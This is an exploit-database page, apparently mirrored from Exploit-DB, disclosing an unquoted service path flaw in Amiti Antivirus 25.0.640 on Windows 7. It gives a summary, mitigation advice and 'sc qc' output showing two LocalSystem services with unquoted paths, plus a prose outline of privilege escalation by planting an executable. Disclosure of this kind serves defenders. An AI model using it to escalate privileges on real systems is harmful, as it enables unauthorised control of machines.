header-logo
Suggest Exploit
vendor:
Amiti Antivirus
by:
ZwX
7.5
CVSS
HIGH
Unquoted Service Path
428
CWE
Product Name: Amiti Antivirus
Affected Version From: 25.0.640
Affected Version To: 25.0.640
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2019

Amiti Antivirus 25.0.640 – Unquoted Service Path

The Amiti Antivirus software version 25.0.640 is vulnerable to an unquoted service path vulnerability. This vulnerability allows an attacker to escalate privileges by exploiting the way the service binary path is set. By placing a malicious executable in a specific location, an attacker can execute arbitrary code with elevated privileges.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Amiti Antivirus or apply the vendor-supplied patch. Additionally, users can manually set the correct service binary path to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : https://www.netgate.sk/download/download.php?id=11
#Tested on OS: Windows 7


#Analyze PoC :
==============


C:\Users\ZwX>sc qc ScsiAccess
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: AmitiAvHealth
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Amiti Antivirus Health Check
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\ZwX>sc qc AmitiAvSrv
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: AmitiAvSrv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Amiti Antivirus Engine Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Navigation

Suggest Exploit

Services By CQR